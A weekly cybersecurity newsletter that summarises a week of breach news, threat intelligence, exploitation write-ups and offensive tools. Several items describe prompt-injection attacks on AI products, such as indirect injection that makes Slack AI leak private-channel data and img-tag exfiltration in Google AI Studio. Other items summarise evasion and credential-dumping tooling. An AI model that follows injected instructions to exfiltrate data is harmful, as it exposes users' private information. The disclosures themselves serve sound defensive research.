Last Week in Security - 2024-08-27

We're Hiring!

Immediate Open Positions:

Maryland Applicants:

• We have openings for a Technical Writer, Red Team Operator, Red Team Operator Infrastructure Engineer, Red Team Operator Tool Developer, Systems Engineer, HPC Software Engineer, Information Systems Security Engineer, Cyber Operator Developer Analyst (CODA), Senior Data Analyst and Earned Value Management Specialist.

Virginia Applicants:

• Available opportunities: Land and Expeditionary Warfare Specialist, Cyber Warfare Threat Analyst, and Cyber Network Operator.

For more open positions visit: https://www.sixgen.io/careers

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools, and exploits from the past week. This post covers 2024-08-19 to 2024-08-26.

News

• National Public Data Published Its Own Passwords - National Public Data (NPD) suffered a breach that exposed Americans' personal information, including Social Security Numbers. Another NPD affiliate accidentally published passwords to their database. The breach was acknowledged in August 2024 but dates back to December 2023. The exposed data included names, phone numbers, and email addresses. Individuals are advised to freeze their credit files and regularly check their credit reports to prevent identity theft. Numerous cybercriminal services offer detailed background checks on consumers, powered by data from compromised accounts at data brokers.

• Announcing mandatory multi-factor authentication for Azure sign-in - Microsoft announced that mandatory multi-factor authentication (MFA) will be required for all Azure sign-ins to enhance security and protect digital assets. The rollout will be phased, starting with Microsoft Entra admin center and Intune admin center in October, followed by Azure mobile app and Infrastructure as Code tools in early 2025. Users can utilize MFA through Microsoft Authenticator, FIDO2 security keys, certificate-based authentication, and passkeys. Additional notifications will be provided to help users prepare for the MFA requirement, and Microsoft is committed to delivering a low-friction experience for legitimate customers while ensuring robust security measures are in place.

• The best hacks and security research from Black Hat and Def Con 2024 - At the Black Hat and Def Con security conferences in Las Vegas, hackers, researchers, and security professionals shared the latest research, hacks, and knowledge. Highlights included hacking Ecovac robots to spy on owners, infiltrating the LockBit ransomware game, using a laser microphone to hear keyboard taps, and tricking Microsoft Copilot with prompt injections. Additionally, a security researcher saved six companies from ransomware by identifying flaws in ransomware leak sites. The conferences showcased cutting-edge research and tactics in cybersecurity. This post covers the juicy hacks presented at Defcon and BlackHat 2024.

• Hardware backdoors found in Chinese key cards - A security researcher discovered secret hardware backdoors in RFID key cards manufactured by a major Chinese company, allowing threat actors to clone affected cards and access secure areas. The backdoors were found in smart cards manufactured by Shanghai Fudan Microelectronics using chips from NXP, dating back to 1994. The backdoor authentication key was discovered in newer and older card models, impacting cards from other companies as well.

• SolarWinds left critical hardcoded credentials in its Web Help Desk product - SolarWinds unintentionally left hardcoded credentials in its Web Help Desk product, allowing remote attackers to access vulnerable instances and modify sensitive data. The software maker has issued an update to fix the oversight, but users must manually install the patch. This security vulnerability, with a severity rating of 9.1 out of 10, could be exploited by criminals targeting systems accessible from the public internet. The issue comes after SolarWinds faced previous security challenges, including Russian spies infiltrating its customer networks.

• How the ransomware attack at Change Healthcare went down: A timeline - A ransomware attack on Change Healthcare resulted in one of the largest data breaches of U.S. health and medical data. The attack, carried out by a ransomware gang called ALPHV/BlackCat, led to UnitedHealth paying a ransom of $22 million. The hackers stole sensitive medical data on a "substantial proportion of people in America," and the incident caused widespread disruption in the healthcare sector. The U.S. government offered a $10 million bounty for information leading to the capture of the ransomware gang's leaders, and a contractor formed a new ransom gang called RansomHub, demanding a second ransom from UnitedHealth. Change Healthcare began notifying affected individuals in June, and UnitedHealth's CEO admitted that the breach was preventable due to lax cybersecurity measures.

• Chinese Hackers Exploit Zero-Day Cisco Switch Flaw to Gain System Control - Chinese hackers exploited a zero-day security flaw in Cisco switches to gain control of systems, facilitating data exfiltration and persistent access. The threat group, Velvet Ant, used a sophisticated attack chain involving bespoke malware to evade detection and leverage network devices for persistence. This activity was attributed to an espionage campaign targeting an unnamed organization in East Asia, prompting Cisco to issue security updates.

• Local Networks Go Global When Domain Names Collide - The proliferation of new top-level domains has created a security vulnerability where organizations are sending their Windows usernames and passwords to domain names they do not control. This can lead to interception and modification of sensitive information. Security researcher Seralys Caturegli has been mapping this vulnerability by scanning the Internet for self-signed certificates referencing certain TLDs. This issue has the potential for serious data breaches, and organizations are encouraged to address it to prevent cybercrime groups from exploiting it.

• Halliburton shuts down systems after cyberattack - Oil drilling and fracking giant Halliburton shut down some of its internal systems after a cyberattack. The company became aware of unauthorized access to its systems and responded by proactively taking certain systems offline. There are no indications that the incident is impacting energy services at this time, according to the U.S. Department of Energy. Halliburton declined to comment further on the nature of the security incident and is working to identify any effects of the cyberattack.

Threat Intel and Defense

• The gift that keeps on giving: A new opportunistic Log4j campaign - Despite being over two years old, the Log4j vulnerability (Log4Shell) remains a persistent threat, as demonstrated by a recent campaign leveraging it for crypto-mining and system compromise. The attack uses obfuscated LDAP requests to evade detection and establishes persistence, performs system reconnaissance, and exfiltrates data through backdoors and encrypted communication channels. Various threat groups have exploited Log4Shell, and opportunistic hackers have integrated it into their operations.

• Linux Detection Engineering - A primer on persistence mechanisms - The article is a walkthrough on how threat actors establish persistence on Linux systems and how to hunt for these techniques. It covers various methods such as scheduled tasks, systemd services, shell profile modifications, SSH key modifications, bind shells, and reverse shells. The article provides practical demonstrations and tools like PANIX for testing the coverage of these techniques. It also discusses hunting strategies using ES|QL aggregation queries and OSQuery for each method. The article aims to educate defenders and security researchers on foundational aspects of Linux persistence techniques.

• Be careful what you pwish for – Phishing in PWA applications - ESET researchers have discovered a new type of phishing campaign targeting mobile users, specifically using Progressive Web Applications (PWAs) on Android and iOS. This campaign installs phishing apps from third-party websites without user consent, bypassing traditional security warnings. The phishing apps mimic banking apps and steal user credentials, with different threat actors targeting clients of Czech, Hungarian, and Georgian banks. ESET reported this phishing activity to the affected banks and took down multiple phishing domains and command and control servers.

• Recent Phishing Campaigns Discovered by ANY.RUN Researchers - ANY.RUN researchers have discovered recent phishing campaigns, including the Tycoon 2FA Phish-kit attack, targeting compromised Amazon Simple Email Service accounts. The campaigns involve advanced techniques to avoid detection, such as long chains of redirects. The phishing operations use various domains and communication protocols to steal user data. Another campaign involves using Freshdesk to create lure pages with phishing links. Additionally, a phishing campaign using SharePoint to host PDFs with phishing links has seen a high volume of attacks.

• MoonPeak malware from North Korean actors unveils new details on attacker infrastructure - Cisco Talos has discovered the MoonPeak malware, a remote access trojan being actively developed by a North Korean threat actor group known as UAT-5394. The analysis of the infrastructure used by the threat actor group reveals new details on their tactics, techniques, and procedures. The evolution of MoonPeak from the XenoRAT malware shows the threat actor's continuous development and evolution of their tooling.

• Autoencoder Is All You Need: Profiling and Detecting Malicious DNS Traffic - This article discusses how an autoencoder deep learning method is used to profile and detect malicious DNS traffic patterns to improve detection of suspicious network activity. Various detection modules are developed based on these DNS profiles to identify suspicious domains from different perspectives. By analyzing DNS traffic patterns, unauthorized infiltration attempts can be detected and prevented. The article also includes case studies and details on how the autoencoder-based system works to detect and block malicious DNS requests in real-time.

• Best Laid Plans: TA453 Targets Religious Figure with Fake Podcast Invite Delivering New BlackSmith Malware Toolset - Proofpoint's Threat Research Team identified Iranian threat actor TA453 targeting a prominent religious figure with a fake podcast interview invitation. The attack aimed to deliver the BlackSmith malware toolset, specifically the AnvilEcho PowerShell trojan, for intelligence gathering and exfiltration. TA453 used social engineering techniques to build trust with the target before delivering the malicious payload. AnvilEcho combines multiple malware capabilities into a single PowerShell script, demonstrating TA453's sophisticated intelligence collection toolkit.

• Deconstructing Security Monitoring Antipatterns - Antipatterns are patterns of non-optimal or bad practices that can be common responses to problems. In the context of security monitoring, some antipatterns include focusing solely on network data for detection, using off-the-shelf solutions, and prioritizing shiny new tools over basic IT hygiene. It's important to prioritize people, processes, and tools in that order, and not rely on one tool to provide complete security.

• Xeon Sender: A SMS Spam Shipping Multi-Tool Targeting SaaS Credentials - Xeon Sender is a Python script used for sending SMS spam through various SaaS providers. It has been repurposed by multiple threat actors and distributed through platforms like Telegram. The tool enables attackers to conduct SMS spam and phishing campaigns using legitimate APIs from service providers.

• 19th August – Checkpoint Threat Intelligence Report - The Threat Intelligence Report from Check Point Research on August 19, 2024, highlights various cyber attacks and breaches, including the leak of internal communications from Donald Trump's presidential campaign by an Iranian threat actor and a significant financial loss due to a BEC scam at Orion SA. Additionally, there were ransomware attacks on the city of Flint, Michigan, Unicoin, and Evolution Mining, among others. The report also discusses vulnerabilities like Server-Side Template Injection and Microsoft's Patch Tuesday with 90 vulnerabilities, including zero-day vulnerabilities being actively exploited. Check Point Research has also identified new malware called Styx Stealer and reported on cyber attacks following the contested presidential elections in Venezuela.

• Enhancing Network Security: Monitoring Client Communication with Velociraptor - This is an overview of using the Velociraptor tool to detect and monitor endpoints for malicious activity.

• My Methodology to AWS Detection Engineering (Part 1: Object Selection) - This blog series discusses the author's methodology for threat detection engineering in AWS, focusing on object selection in the first part. The author questions traditional methodologies and advocates for a more nuanced approach that incorporates risk-based alerting concepts and selects critical fields logged by CloudTrail. By assigning numerical values to risk objects and aggregating them, a more comprehensive and effective detection system can be created. The author provides examples and explanations for how this approach can be implemented for identifying potential threats in AWS environments.

• Unmasking Styx Stealer: How a Hacker’s Slip Led to an Intelligence Treasure Trove - Check Point Research (CPR) uncovered Styx Stealer, a new malware capable of stealing browser data, instant messenger sessions, and cryptocurrency. The developer of the malware, Sty1x, made a critical error that leaked sensitive information from his computer, leading to valuable intelligence about the malware and its connections to the Agent Tesla threat actor, Fucosreal. Styx Stealer was derived from Phemedrone Stealer and was offered for sale on the website styxcrypter[.]com. The malware includes features like crypto-clipper, auto-start, clipboard monitor, and additional sandbox evasion techniques.

• What a Cluster! How Industry Groups and Names Threat Activity Clusters - The article discusses the practice of clustering threat activities and giving them names to better track, correlate, and describe future cyber threats. This has become more common among security researchers, leading to confusion for those new to cyber threat intelligence. The article defines intrusion clusters as a collection of intrusion activities and explains how they evolve over time. It also covers the process of merging clusters into threat actor groups and provides examples from industry experts. The article concludes with shoutouts to researchers who contributed to validating intrusion cluster names.

• Hold Me Closer, TinyPilot - KVM-over-IP devices allow remote access to a keyboard, monitor, and mouse without installing software on the system being controlled. Some of these devices lack authentication and can be vulnerable to attacks if exposed on the internet.

• Botnet Fenix - The post analyzes the Fenix botnet malware infection chain, starting from a user downloading a ZIP file from a Dropbox link to the execution of malicious shellcode. The analysis includes deobfuscating JavaScript functions, downloading a .NET executable, and emulating shellcode with a tool called Speakeasy. The malware sets up persistence on the host by changing registry values and periodically requests new tasks from the botnet.

• PG_MEM: A Malware Hidden in the Postgres Processes - Aqua Security has discovered a new PostgreSQL malware called PG_MEM that brute forces its way into databases, hides its operations, and mines cryptocurrency. The attack involves creating superusers, dropping files to eliminate competition and gain persistence, and deploying cryptocurrency miners.

• PEAKLIGHT: Decoding the Stealthy Memory-Only Malware - Mandiant identified a new memory-only dropper called PEAKLIGHT, which decrypts and executes a PowerShell-based downloader. This downloader delivers malware-as-a-service infostealers and utilizes evasion techniques like system binary proxy execution and content delivery network abuse. PEAKLIGHT downloads payloads such as LUMMAC.V2, SHADOWADDER, and CRYPTBOT, each with unique characteristics.

• Understanding the Process Environment Block (PEB) for Malware Analysis - The article discusses the Process Environment Block (PEB) and its importance in malware analysis. It explains how PEB is a structure that holds important data about a process for the Operating System, and how it can be accessed through the Thread Environment Block (TEB). The article discusses key PEB fields that are commonly exploited by malware developers for various purposes such as anti-debugging, API hashing, process hollowing, and UAC bypass. It also provides practical examples and analysis of these techniques, including using PEB for command line manipulation and UAC bypass in BlackMatter Ransomware.

• Bling Libra’s Tactical Evolution: The Threat Actor Group Behind ShinyHunters Ransomware - Bling Libra, the threat actor group behind the ShinyHunters ransomware, recently shifted their tactics to extorting victims instead of selling stolen data. They acquired legitimate credentials from public repositories to gain access to organizations' AWS environments. Despite limited permissions, they were able to infiltrate and conduct reconnaissance operations using tools like S3 Browser and WinSCP. Proactive cybersecurity measures, robust security practices, and tools like AWS Security Hub are crucial to safeguard cloud assets from threats like Bling Libra.

Techniques and Write-ups

• Cobalt Strike DNS Listener Setup - This blog post covers the setup and configuration of a DNS listener in Cobalt Strike for research purposes only. It details the steps to create a DNS listener in Cobalt Strike, the advantages and disadvantages of using DNS for C2 traffic, and the setup of a VM in Microsoft Azure as a redirector. The blog also explains the configuration of DNS in GoDaddy, creation of a Cobalt Strike VM in Azure, and testing of the DNS listener to ensure proper communication between the beacon and the Cobalt Strike Team server. Additionally, it provides information on how to check the functionality of the DNS listener and interact with the DNS beacon for communication purposes.

• Navigating the Uncharted: A Framework for Attack Path Discovery - The post discusses a framework for discovering attack paths, which are chains of control relationships with at least one violation of the Clean Source Principle. The framework involves mapping security dependencies, weaponizing for control, and identifying Clean Source violations. Attack paths must include at least one clean source violation that can be abused to control dependent resources. The next post will apply this framework to a widely used technology.

• SSRFing the Web with the help of Copilot Studio - A critical SSRF vulnerability was discovered in Microsoft's Copilot Studio, allowing researchers access to potentially sensitive information with cross-tenant impact. The vulnerability allowed bypassing SSRF protections to access Microsoft's internal infrastructure, including sensitive data like Instance Metadata Service and Cosmos DB instances. Microsoft responded quickly to address the issue, classifying it as a Critical Information Disclosure problem.

• Malware development: persistence - part 26. Microsoft Edge - part 1. Simple C example. - This post discusses malware development and persistence techniques, specifically focusing on Microsoft Edge and using registry keys for persistence. The author demonstrates how to replace registry key values in C code and shows the impact on the operating system. The post emphasizes the importance of understanding these techniques for both defensive and offensive cybersecurity purposes. The code examples and screenshots provide a practical educational resource for cybersecurity enthusiasts.

• From MLOps to MLOops: Exposing the Attack Surface of Machine Learning Platforms - The article discusses the importance of MLOps platforms in today's technology landscape and highlights the security vulnerabilities that can be exposed in machine learning platforms.

• Approach to mainframe penetration testing on z/OS - The article discusses the structure and features of mainframe penetration testing on z/OS operating system, focusing on the approach to pentesting IBM mainframes, potential attack vectors, and privilege escalation methods. It covers topics such as accessing mainframe resources, exploiting configuration errors related to dataset and resource class access control, interacting with mainframe subsystems, and exfiltrating data. The article also mentions the scarcity of specialists in this area, emphasizing the importance of understanding the internal structure of mainframes for successful penetration testing.

• Adversary at the Door – Initial Access and what’s currently on the menu - The blog post discusses initial access techniques used by adversaries to gain access to networks, with phishing being the most common vector. Various technologies such as Windows SmartScreen, Authenticode, and Application Allowlisting are mentioned as safeguards against initial access attempts. The post also includes a demonstration of using malicious HTA payloads to gain access and emphasizes the importance of prevention strategies such as robust AV/EDR solutions, patch management, and email filters to mitigate threats.

• A Patchdiffing Journey – TP-Link Omada - The blog post describes a patchdiffing journey involving TP-Link Omada routers undertaken after the Pwn2Own 2023 competition. The team discovered a vulnerability in the TP-Link router related to a DHCPv6 client option stack-based buffer overflow, which allowed for remote code execution. By analyzing the vulnerable and patched binaries, they were able to craft a PoC exploit to gain control of the router. The exploit involved sending a payload that triggered the vulnerability and allowed for the execution of arbitrary commands, leading to the successful exploitation of the router.

• Teach a Man to Phish: A Decade of Distilled Phishing Wisdom - Forrest Kasler shares a decade of phishing wisdom from the SpecterOps team, giving away all of his secrets for free in a series of posts. The key takeaways include the thrill of phishing, the importance of creativity over canned templates, and the ability to bypass controls. Each post in the series addresses different aspects of phishing, such as targeting, domain reputation, bypassing spam filters, and more. The ultimate goal is to help readers become successful phishers by understanding and overcoming various challenges.

• An Introduction to GCPwn – Parts 2 and 3 - Introduction to GCPWN

• RAG chatbot using AI Endpoints and LangChain4J - The RAG chatbot uses AI Endpoints and LangChain4J to improve its responses by injecting data into the context of a Large Language Model. By transforming data into vectors, the chatbot can search for similarities in new data based on a question. The setup involves obtaining a valid token, adding dependencies, and creating the RAGStreamingChatbot class. AI Endpoints, offered by OVHcloud, provide access to advanced AI models such as Large Language Models, natural language processing, translation, and more, without the need for AI expertise.

• "WireServing" Up Credentials: Escalating Privileges in Azure Kubernetes Services - Mandiant disclosed a privilege escalation vulnerability to Microsoft in Azure Kubernetes Services that allowed attackers to access credentials for services used by the cluster, potentially leading to data theft, financial loss, reputation harm, and other impacts. The vulnerability affected clusters using "Azure CNI" for network configuration and "Azure" for network policy. The attack involved downloading the configuration used to provision the cluster node and extracting TLS bootstrap tokens to read all secrets within the cluster.

• Web Browser Stored Credentials - The article discusses how web browsers store credentials using DPAPI encryption and how red teams target these credential storage locations to gain access to other applications. Tools like Mimikatz, SharpDPAPI, and CredentialKatz can be used to decrypt the master keys and retrieve the encrypted keys from browsers like Chrome and Edge. Domain backup keys can also be used to decrypt master keys, allowing access to stored credentials.

• A New App Consent Attack: Hidden Consent Grant - Semperis has uncovered a new App Consent Attack called Hidden Consent Grant, where malicious actors can gain access to sensitive resources and data. Their Directory Services Protector can help detect and mitigate this attack.

• Technical Analysis: CVE-2024-38021 - Technical analysis was conducted on CVE-2024-38021, a vulnerability found in Microsoft Outlook that could lead to remote code execution. Despite attempts to patch, the NTLM credential leak issue remains unaddressed, requiring organizations to follow security best practices and prioritize regular patching.

• How multiple vulnerabilities in Microsoft apps for macOS pave the way to stealing permissions - Cisco Talos has identified eight vulnerabilities in Microsoft applications for macOS, allowing an attacker to inject malicious libraries and gain entitlements and user-granted permissions. These vulnerabilities could potentially lead to sensitive data leakage or privilege escalation. The post also discusses the macOS security model, which includes Transparency, Consent, and Control (TCC) framework, and how attackers can exploit vulnerabilities to steal app permissions. Microsoft considered these issues low risk and declined to fix some of the vulnerabilities.

• CVE-2024-7646: Ingress-NGINX Annotation Validation Bypass – A Deep Dive - CVE-2024-7646 is a vulnerability in the popular ingress-nginx controller that allows malicious actors to bypass annotation validation and potentially gain unauthorized access to cluster resources.

• Unauthenticated remote code execution on BYOB via arbitrary file write+command injection - A security researcher discovered unauthenticated remote code execution vulnerabilities in the Build Your Own Botnet (BYOB) framework, allowing attackers to take control of the botnet server. The first vulnerability involved arbitrary file write in an exfiltration endpoint, similar to a previously disclosed vulnerability in Empire C2. The second vulnerability was a command injection in the payload generation page, which allowed attackers to inject commands into the system.

• Addressed AWS defaults risks: OIDC, Terraform and Anonymous to AdministratorAccess - The article discusses potential risks in AWS related to OIDC, Terraform, and Admin Access. It highlights how misconfigurations can lead to unintentional administrative access from the internet to authorized resources. The author shares their findings and research on exploiting mass cloud exploitation through misconfigurations. AWS has since addressed some of these default risks and made improvements in the default Terraform OIDC Trust Policy.

• Ghost in the PPL Part 2: From BYOVDLL to Arbitrary Code Execution in LSASS - In part 2 of the "Ghost in the PPL" series, the author discusses the "Bring Your Own Vulnerable DLL" technique to reintroduce known vulnerabilities in LSASS and achieve arbitrary code execution. The exploit involves using a use-after-free bug in the RPC procedure of the KeyIso service. The author explores various strategies, including bypassing Control Flow Guard, and leveraging RPC calls to coerce LSASS to open a process handle. Despite setbacks, the author successfully combines these techniques to achieve the final exploit, leading to the duplication of process handles and proving the effectiveness of the advanced exploitation technique.

• BLUUID: Firewallas, Diabetics, And… Bluetooth - The blog explores the topic of identifying Bluetooth devices remotely and highlights the lack of oversight in healthcare devices using Bluetooth. It discusses vulnerabilities in firewall products and issues with BTLE enabled insulin pumps, showcasing the potential harm caused by BTLE vulnerabilities. The author demonstrates how to build a database of Bluetooth Low-Energy Generic Attribute Universally Unique Identifiers (UUIDs) for vulnerability research. A case study of exploiting vulnerabilities in Firewalla hardware and app is provided as a proof of concept, emphasizing the importance of understanding and addressing Bluetooth security and privacy concerns in the industry.

• Data Exfiltration from Slack AI via indirect prompt injection - A vulnerability in Slack AI allows attackers to steal data from private channels by manipulating the language model used for content generation. This can be done through indirect prompt injection, where the attacker can prompt Slack AI to exfiltrate data from private channels they are not a part of.

• Google AI Studio: LLM-Powered Data Exfiltration Hits Again! Quickly Fixed. - Recently, a data exfiltration vulnerability was discovered in Google AI Studio, allowing for information to be leaked via image rendering during prompt injection. The exploit was quickly fixed after it was reported. The vulnerability involved using HTML img tags to exfiltrate data, with the exploit demonstrated using performance reviews uploaded to the platform. The issue was remedied within 24 hours by Google, highlighting the importance of addressing novel threats like data exfiltration via image rendering.

• CVE-2024-22263: Spring Cloud Dataflow Arbitrary File Writing - In August 2024, a vulnerability (CVE-2024-22263) was discovered in Spring Cloud Data Flow's Skipper server component, allowing attackers to write arbitrary files to the server's filesystem. The issue was caused by insufficient path sanitization in the upload process. A patch was released to address this by reordering the validation process and sanitizing user inputs to prevent unauthorized file writes. Users are advised to update to fixed versions to mitigate the risk of exploitation and protect their systems from potential attacks.

• Memory corruption vulnerabilities in Suricata and FreeRDP - Kaspersky discovered memory corruption vulnerabilities in Suricata and FreeRDP through penetration testing before releasing their products Kaspersky Thin Client and Kaspersky IoT Secure Gateway. They found multiple vulnerabilities in these open-source components and reported them to the developers. The community confirmed the issues and registered CVEs for them. Kaspersky provided details of the vulnerabilities and shared fuzzing tests with the communities, leading to patches being issued for the vulnerabilities. It is recommended to update to the latest versions of Suricata and FreeRDP to mitigate these vulnerabilities.

• You just got vectored – Using Vectored Exception Handlers (VEH) for defense evasion and process injection - Vectored Exception Handlers (VEH) have been used in malware for over a decade and have recently gained attention from the offensive security industry. Researchers have explored how VEH can be manipulated for defense evasion and process injection. By manually manipulating the VEH list, users can add their own exception handlers to evade security defenses. EDR products also use VEH, so it is important to prevent tampering with the VEH list. VEH manipulation can be used for threadless process injection, bypassing the need for execution primitives. It is important to be aware of the implications of VEH manipulation and to detect any malicious activity involving VEH.

• CVE-2022-22265 Samsung npu driver - The blog post discusses the exploitation of a bug in the Samsung npu driver using CVE-2022-22265. The post provides a detailed explanation of the vulnerability, the exploitation strategy, and code snippets involved. The exploitation involves triggering a double free vulnerability in the npu driver to gain control and achieve local privilege escalation. The post also discusses techniques such as memory spraying, PTE manipulation, and code injection to achieve the desired outcome of obtaining reverse root shell access. The author aims to improve the exploit's reliability by replacing the signalfd structure and enhancing the cross-cache process.

• Try it for yourself: the latest PortSwigger Research from Black Hat USA - PortSwigger Research released three groundbreaking research findings at Black Hat USA, addressing web application security threats. Techniques like web timing attacks, email parsing discrepancies, and web cache exploitation were explored. Users can try these techniques out in Burp Suite Professional and access new labs in the Web Security Academy. The research aims to drive innovation in Burp Suite and equip users with the latest tools for detecting vulnerabilities.

• CSRF: A complete guide to exploiting advanced CSRF vulnerabilities - This article provides a comprehensive guide on exploiting advanced CSRF vulnerabilities, including basic and advanced exploitation methods. It explains how CSRF vulnerabilities work and the conditions that make a web application vulnerable to CSRF attacks. The article also introduces tools that can automate CSRF attacks and includes practice scenarios for readers to test their skills.

• OWASP TOP 10: Insufficient Attack Protection #7 – CAPTCHA Bypass - The blog discusses the vulnerability of CAPTCHA bypass attacks and the importance of CAPTCHA in protecting websites from automated bots. It explains the risks, implications, and methods attackers use to bypass CAPTCHA. The blog also provides solutions and best practices to strengthen CAPTCHA security, including choosing well-designed CAPTCHA systems, implementing them correctly, and protecting CAPTCHA keys. Additionally, it covers common design and implementation issues that lead to CAPTCHA bypass and provides examples of how attackers can exploit them.

• Streaming vulnerabilities from Windows Kernel - Proxying to Kernel - Part I - Recently, DEVCORE conducted research on Windows Kernel vulnerabilities, specifically in the Microsoft Kernel Streaming Service (MSKSSRV), leading to the discovery of multiple vulnerabilities that could be exploited for privilege escalation. This research will be continued in Part II, with the goal of further exploring the attack surface of Kernel Streaming.

• NTLM Credential Theft in Python Windows Applications - Research performed by Horizon3 on NTLM credential theft inside of Python Windows Applications

• Traccar 5 Remote Code Execution Vulnerabilities - Horizon3.ai reported Traccar 5 Remote Code Execution Vulnerabilities, which could be exploited by unauthenticated attackers if guest registration is enabled.

• Monke's Guide to Bug Bounty Methodology - Ciarán, also known as Monke, shares his guide to bug bounty methodology, aimed at new hackers struggling to be consistent. He emphasizes the importance of having a methodology, which includes approaches, persistence, and execution order. He recommends tools like Caido and Burpsuite for bug hunting and stresses the need for patience, consistency, and collaboration in the bug bounty community.

• Cobalt Strike - CDN / Reverse Proxy Setup - The author discusses setting up a C2 infrastructure using Cobalt Strike, CDNs, and Nginx as a reverse proxy in a blog post. They emphasize the importance of selecting a high reputation domain for the C2 setup and walk through the configuration steps, including configuring Azure components, Nginx, and Cobalt Strike. They highlight the use of Malleable profiles to customize and obfuscate beacon traffic and demonstrate testing the C2 setup to ensure proper functionality. Overall, the setup provides a secure communication environment for C2 operations.

Tools and Exploits

• Breach the Gates - Initial Access Craft in 2024 - The repository contains resources linked to a presentation on the topic "Breach the Gat, Advanced Initial Access in 2024" at OffensiveX in Athens in June 2024. It includes information on automating workflows, hosting and managing packages, finding and fixing vulnerabilities, writing better code with AI, managing code changes, planning and tracking work, and collaborating outside of code.

• TrickDump - The TrickDump GitHub repository contains a program that dumps the lsass process using only NTAPIS, which creates 3 JSON and 1 ZIP file with memory region dumps. The process involves three steps to gather OS information, obtain SeDebugPrivilege, and dump memory regions. The technique ensures that there is no valid Minidump file left on disk, memory, or network traffic, and uses separate programs to minimize suspicion.

• ASRepCatcher - The GitHub repository "ASRepCatcher" by user Yaxxine7 is a tool designed to use ARP spoofing to catch AS-REP messages returned by the Domain Controller to clients and prints out the hash to crack. The tool works for all users on the VLAN and has features for both relay mode and listen mode. Users can disable ARP spoofing or use their own spoofing method if preferred. The tool requires at least Python 3.7 to run.

• Azure Tiering - This GitHub repository contains a project focused on Azure administrative tiering based on known attack paths. The project provides a better understanding of security implications and serves as a base for further development, allowing for the customization of tier models based on specific business requirements and governance strategies. The project categorizes administrative assets in Microsoft Graph and Azure based on testing their effective capabilities and warns that the research project may not be flawless or complete, with the maintenance being based on best effort.

• Hookchain - The article introduces HookChain, a technique that combines IAT Hooking techniques, dynamic SSN resolution, and indirect system calls to evade traditional EDR systems effectively. It redirects the execution flow of Windows subsystems invisibly to EDRs that only act on Ntdll.dll without requiring changes to source code.

• RogueApps - This GitHub repository, huntresslabs/rogueapps, documents observed OAuth application tradecraft when good OAuth apps go rogue. It provides information on the TTPs associated with OIDC/OAuth 2.0 application attacks and encourages contributions to the project by following the Wiki Contribution Guide. Users can clone the repository, install Node modules, and start a local dev server to test new RogueApps before they are pushed to production. Additionally, users can access the RogueApps dataset via a curl command to the GitHub content.

• DeadPotato - DeadPotato is a privilege escalation utility for Windows that leverages the SeImpersonate right to obtain SYSTEM privileges. It has been customized from the original GodPotato source code by BeichenDream and offers various modules for different purposes, such as executing commands, creating new administrator users, and dumping SAM hashes. Users need to ensure the SeImpersonatePrivilege right is enabled in their context to use DeadPotato effectively. The tool warns against unauthorized use and advises caution when using it.

• Leaked Wallpaper - This GitHub repository contains a privilege escalation tool that was fixed in KB5040434. The tool allows for the leaking of a user's NetNTLM hash from any session on the computer, even if working from a low-privileged account. By using this tool, it is possible to obtain the NetNTLM hash of a privileged administrator account from a low-privileged account.

• ShimMe - Invokes an RPC method in OfficeClickToRun service that will inject a DLL into a suspended process running as NT AUTHORITY\SYSTEM launched by the task scheduler service, thus achieving privilege escalation from administrator to SYSTEM.

• koppeling-p - GitHub repository klezVirus/koppeling-p is an extension to a project by Nick Landers that focuses on Adaptive DLL hijacking and dynamic export forwarding with EAT preservation. The project aims to preserve the DLL target export address table during cloning, serving as a base for more advanced libraries and ongoing research projects. The project is written in Python and does not have any releases or packages published.

• Shwmae - Shwmae (shuh-my) is a Windows Hello abuse tool that was released during DEF CON 32 as part of the Abusing Windows Hello Without a Severed Hand talk. The purpose of the tool is to abuse Windows Hello from a privileged user context.

• QuickShell - The GitHub repository SafeBreach-Labs/QuickShell contains a library and tools for exploiting and communicating with Google's Quick Share devices. The tools included in the repository demonstrate critical vulnerabilities in Quick Share and include a Remote Code Execution (RCE) attack chain tool. The project was presented at DEF CON 32 in 2024 and aims to improve security by identifying and addressing vulnerabilities in Quick Share.

• Tempest - Tempest is a command and control framework written in Rust for research purposes. It is designed for learning and experimentation rather than production operations. The project is a work in progress and moves at a slower pace due to the research-focused approach. Users are encouraged to fork the project, modify it, or use it as a reference to create their own command and control frameworks. The framework includes features like a Terminal User Interface (TUI), AI modules, hardening of authentication, and various communication protocols.

• TrailShark: Understanding AWS API and Service Interactions - TrailShark is an open-source plugin that connects Wireshark with AWS CloudTrail logs to analyze API calls and identify vulnerabilities in AWS accounts.

• ixode - The GitHub repository "ixode" contains an exploit for a vulnerability in the n_gsm code. The exploit triggers the KASAN splat and must be run as root. It is recommended to use a specific config from Ubuntu LTS to reproduce the exploit. Certain steps are required to set up the environment for the exploit.

• SIMurai - SIMurai is a software platform designed for security-focused SIM exploration and experimentation. At its core, it offers a versatile software SIM implementation that can be integrated into various environments for advanced testing and development.

• Blinks: Burp Headless Scanning Tool - Blinks is a Burp Suite extension that automates active scanning and enhances functionality with the integration of webhooks to send real-time updates when new issues are identified. This allows for instant actionable insights without waiting for final reports. The tool is compatible with Burp Suite Pro and offers features like single and batch URL processing, customizable report generation, webhook integration, crawl-only mode, SOCKS5 proxy support, and the ability to attach additional extensions.

• SpoofDPI - This GitHub project is called SpoofDPI, a simple and fast anti-censorship tool written in Go. It is designed to bypass Deep Packet Inspection and can be installed on different operating systems using specific commands provided in the README. SpoofDPI works by sending the first 1 byte of a request to the server, and then sending the rest, allowing it to bypass DPI.

• Windows Downdate - WindowsDowndate is a tool that can manipulate Windows Updates to create custom downgrades and uncover previously fixed vulnerabilities.

New to Me and Miscellaneous

This section is for news, techniques, write-ups, tools, and off-topic items that weren't released last week but are new to me. Perhaps you missed them too!

• Reckoning: Part 1 — The Landscape - The first part of the series explores how JavaScript-first frontend culture led to the degradation of US public services, particularly in regards to mobile accessibility. The post discusses the challenges faced by browser developers in adapting to the mobile market and the shortcomings of using legacy desktop-oriented JavaScript frameworks on the mobile web. The piece highlights the failure of web developers to adapt to the changing landscape of mobile usage and the negative impact of bloated scripts on low-end devices.

• Phrack #71 - Phrack Magazine's introduction discusses the dangers of hype-driven technology implementation and the importance of understanding systems. The issue includes topics such as MPEG-CENC defects, bypassing security measures with programming, PostgreSQL injections, exploits, reversing dart AOT snapshots, and more.

• Harnessing the Power of Cobalt Strike Profiles for EDR Evasion - The article discusses the importance of customized Malleable C2 profiles in the Cobalt Strike framework for EDR evasion, demonstrating techniques to improve profiles for Red-Team engagements. It explores bypassing memory scanners, static signatures, YARA rules, and sophisticated EDR solutions like Sophos.

